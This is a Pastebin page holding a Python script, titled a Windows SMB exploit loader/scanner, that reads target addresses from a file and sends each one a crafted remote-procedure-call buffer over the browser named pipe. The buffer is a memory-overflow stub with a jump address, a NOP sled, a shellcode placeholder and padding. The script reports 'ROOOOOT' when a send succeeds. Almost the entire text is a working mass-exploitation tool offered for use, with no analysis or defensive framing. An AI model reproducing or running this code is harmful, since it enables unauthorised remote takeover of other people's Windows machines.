daily pastebin goal
44%
SHARE
TWEET

[Py] Windows SMB exploit Loader/Scan

xB4ckdoorREAL Nov 4th, 2018 166 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #DISCORD: https://discord.gg/PTW3yPp
  2.  
  3.  
  4. import struct
  5. import sys
  6. import time
  7. import os
  8.  
  9. from threading import Thread    
  10.                                  
  11. from impacket import smb
  12. from impacket import uuid
  13. from impacket import dcerpc
  14. from impacket.dcerpc.v5 import transport
  15.  
  16. buf = "shellcode line1"
  17. buf += "shellcode line2"
  18.  
  19. #DO NOT REMOVE THIS
  20. stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
  21. stub += "\x10\x27\x00\x00" #dwRoutingPID
  22. stub += "\xa4\x86\x01\x00" #dwMibInEntrySize
  23. stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
  24. stub += "\x04\x00\x00\x00"  #dwVarID (_MIB_OPAQUE_QUERY)
  25. stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
  26. stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize
  27. stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
  28. stub +=  "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
  29. stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
  30. stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)
  31.  
  32.  
  33. with open("bios.txt") as fp:
  34.     cnt = 0
  35.     for line in fp:
  36.         print "[%d] Attacking ---> %s" % (cnt, line.rstrip())
  37.         try:
  38.             del trans
  39.             del dce
  40.             print("Variable Reset[GOOD]")
  41.         except:
  42.             print("No Variable[GOOD]")
  43.             pass
  44.         try:
  45.             print("Attempting Connection")
  46.             trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % line)
  47.             trans.connect()
  48.             print("[+] Connected Successfully!")
  49.             dce = trans.DCERPC_class(trans)
  50.             dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
  51.             dce.call(0x1e, stub)
  52.             print("[+] ROOOOOOOOOOOOOOOT | Exploit Sent Successfully")
  53.             del dce
  54.             del trans
  55.         except:
  56.             print("[+] :( NO ROOT")
  57.         cnt += 1
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top